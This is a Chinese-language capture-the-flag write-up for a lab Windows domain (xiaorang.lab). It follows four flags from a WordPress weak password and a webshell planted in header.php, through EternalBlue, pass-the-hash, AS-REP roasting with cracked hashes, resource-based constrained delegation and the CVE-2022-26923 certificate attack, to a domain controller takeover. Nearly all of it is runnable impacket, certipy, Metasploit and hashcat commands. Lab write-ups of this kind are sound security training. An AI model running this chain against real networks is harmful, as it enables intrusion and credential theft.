目录

flag1

flag2

flag3 

flag4 

---

flag1

fscan什么也没扫到

访问是个web

 dirsearch开扫

 访问./wp-admin

弱口令admin:123456登录

编辑主题文件 

 在header.php中插入一句话木马

 header.php位置：https://tw.godaddy.com/help/change-the-header-in-wordpress-26441

蚁剑连接./wp-content/themes/twentytwentyone/header.php

 

直接读到flag1

flag2

/tmp目录下传fscan和frp，扫内网，搭隧道 

 

./fscan -h 172.22.15.1/24 > ./result.txt

172.22.15.13 XR-DC01
172.22.15.18 80 XR-CA ADCS
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.26 本机
172.22.15.35 XR-0687 

 先把24的MS17-010永恒之蓝打了

proxychains4 msfconsole

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

hashdump抓一下哈希

 msf的shell有点问题，直接psexec横向过去

proxychains4 python psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

 读到flag2

flag3 

访问24的web

弱口令admin:123456登录

 后台管理导出模板

 

之后手动标注一下域用户名 

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

 一眼AS-ERP Roasting

proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/ 

 跑出来两个TGT

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc

hashcat爆一下

hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7' ./rockyou.txt 

hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc' ./rockyou.txt 

爆出来账密

lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx

跑一下bloodhound

proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

lixiuying 对 XR-0687 具有 GenericWrite 权限 

记得先写入/etc/hosts

172.22.15.35 XR-0687.xiaorang.lab

打RBCD 

proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass '0x401@admin'
proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'
proxychains4 impacket-getST xiaorang.lab/'HACK$':'0x401@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
export KRB5CCNAME=Administrator.ccache
proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

读到flag3

 

flag4 

接下来打打ADCS，这里是CVE-2022-26923

申请证书模版

proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine

接下来用这个工具 

https://github.com/AlmondOffSec/PassTheCert/tree/main/Python

利用上面生成的 pfx 证书配置域控的 RBCD 给上面创建的HACK$

certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'

 

 导入票据

proxychains4 impacket-getST xiaorang.lab/HACK\$:0x401@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator.ccache 

直接psexec无密码登录

 读到flag4

proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk